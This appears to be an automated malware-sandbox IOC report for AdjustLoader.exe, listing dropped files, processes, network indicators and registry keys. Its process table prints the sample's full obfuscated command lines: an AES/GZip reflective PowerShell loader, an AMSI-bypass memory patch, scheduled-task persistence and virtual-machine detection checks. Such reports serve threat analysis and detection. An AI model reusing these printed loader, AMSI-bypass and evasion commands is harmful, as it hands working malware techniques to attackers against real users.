IOC Report
AdjustLoader.exe

loading gif

Files

File Path
Type
Category
Malicious
AdjustLoader.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdjustLoader.exe.log
CSV text
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat
DOS batch file, ASCII text, with very long lines (5544)
dropped
malicious
C:\Windows\$nya-onimai3\$nya-Loli.bat
DOS batch file, ASCII text, with very long lines (5544)
dropped
malicious
C:\Windows\$nya-onimai3\$nya-Loli.vbs
ASCII text, with no line terminators
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_2124a9bbbc9bcd42c441356b65434d39ce58130_e3b0f337_0185b477-0237-4413-af79-4530d85e026f\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_2124a9bbbc9bcd42c441356b65434d39ce58130_e3b0f337_73110769-c974-4c3a-bd17-f03ae3957338\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_2124a9bbbc9bcd42c441356b65434d39ce58130_e3b0f337_ffa47939-e8c5-4490-9530-bc52e59e4806\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E1C.tmp.dmp
Mini DuMP crash report, 15 streams, Sat Aug 31 19:46:47 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2541.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2571.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4655.tmp.dmp
Mini DuMP crash report, 15 streams, Sat Aug 31 19:46:58 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5029.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5098.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8844.tmp.dmp
Mini DuMP crash report, 15 streams, Sat Aug 31 19:46:09 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D27.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D67.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14ofe3tl.ima.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42gqzrpg.i2m.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ujtgf3f.12y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btntijkm.e01.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mldhitmi.fjs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p22e0shf.5vb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwqb2gep.hsq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqcdbtsr.3kk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tdj4tmy5.3sc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgiboffp.sd5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgxpybwe.rd4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsrby4v2.o02.psm1
ASCII text, with no line terminators
dropped
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_anibrtgr.vou.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_eq4drbh0.jzz.ps1
ASCII text, with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\Null
ASCII text, with very long lines (1785), with CRLF line terminators
dropped
There are 27 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\AdjustLoader.exe
"C:\Users\user\Desktop\AdjustLoader.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic diskdrive get Model
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic diskdrive get Manufacturer,Model
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden
malicious
C:\Windows\System32\schtasks.exe
"schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1'
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic diskdrive get Model
malicious
C:\Windows\System32\wscript.exe
wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic diskdrive get Model
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic diskdrive get Manufacturer,Model
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic diskdrive get Manufacturer,Model
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$KgjvIGVxEVSZGV=$beUOypwDoUbYD.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+'c'+'A'+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LwazNVXndbOnNGQThDI=TnoNKHHDUXvA @([String])([IntPtr]);$NNTvoeBCSSTtWDXiVNKSZk=TnoNKHHDUXvA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XiJBUNnkSWN=$beUOypwDoUbYD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+'o'+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$NIFilsXpyGNtBG=$KgjvIGVxEVSZGV.Invoke($Null,@([Object]$XiJBUNnkSWN,[Object](''+'L'+''+[Char](111)+'ad'+'L'+''+[Char](105)+''+'b'+''+'r'+'ary'+[Char](65)+'')));$FVXDSLjzzDTMpWqHV=$KgjvIGVxEVSZGV.Invoke($Null,@([Object]$XiJBUNnkSWN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$QxbfLVI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NIFilsXpyGNtBG,$LwazNVXndbOnNGQThDI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$kmefLeFZtUxOoKQtH=$KgjvIGVxEVSZGV.Invoke($Null,@([Object]$QxbfLVI,[Object](''+'A'+''+'m'+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+'f'+'fer')));$nJBVDYOXmv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FVXDSLjzzDTMpWqHV,$NNTvoeBCSSTtWDXiVNKSZk).Invoke($kmefLeFZtUxOoKQtH,[uint32]8,4,[ref]$nJBVDYOXmv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kmefLeFZtUxOoKQtH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FVXDSLjzzDTMpWqHV,$NNTvoeBCSSTtWDXiVNKSZk).Invoke($kmefLeFZtUxOoKQtH,[uint32]8,0x20,[ref]$nJBVDYOXmv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](110)+''+'y'+''+[Char](97)+''+'-'+'sta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bd6193ea-62bd-4d0d-9eeb-00767b2d70f2}
malicious
C:\Windows\System32\winlogon.exe
winlogon.exe
malicious
C:\Windows\System32\lsass.exe
C:\Windows\system32\lsass.exe
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
malicious
C:\Windows\System32\dwm.exe
"dwm.exe"
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
malicious
C:\Windows\System32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\System32\findstr.exe
findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540
C:\Windows\System32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\System32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Windows\System32\findstr.exe
findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
C:\Windows\System32\findstr.exe
findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox"
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1420 -s 2288
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1420 -s 2504
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5796 -s 2352
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5796 -s 2476
There are 43 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://aka.ms/winsvr-2022-pshelp
unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/ws/2004/09/policy
unknown
http://schemas.xmlsoap.org/wsdl/erties
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://crl.micro/pki/crl/productCerAut_2010-06-2
unknown
http://www.microsoft.co
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
http://upx.sf.net
unknown
https://aka.ms/pscore6
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust
unknown
https://aka.ms/pscore6lBqq
unknown
https://github.com/Pester/Pester
unknown
https://aka.ms/pscore6xGa
unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
unknown
http://crl.micro
unknown
http://schemas.xmlsoap.org/wsdl/soap12/
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://aka.ms/pscore68
unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
unknown
https://ipwho.is/
195.201.57.90
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ipwho.is
195.201.57.90

IPs

IP
Domain
Country
Malicious
83.143.112.51
unknown
Germany
malicious
195.201.57.90
ipwho.is
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE
$nya-stager
malicious
HKEY_LOCAL_MACHINE\SOFTWARE
$nya-dll32
malicious
HKEY_LOCAL_MACHINE\SOFTWARE
$nya-dll64
malicious
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
ProgramId
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
FileId
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
LowerCaseLongPath
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
LongPathHash
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Name
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
OriginalFileName
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Publisher
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
Version
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
BinFileVersion
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
BinaryType
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
ProductName
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
ProductVersion
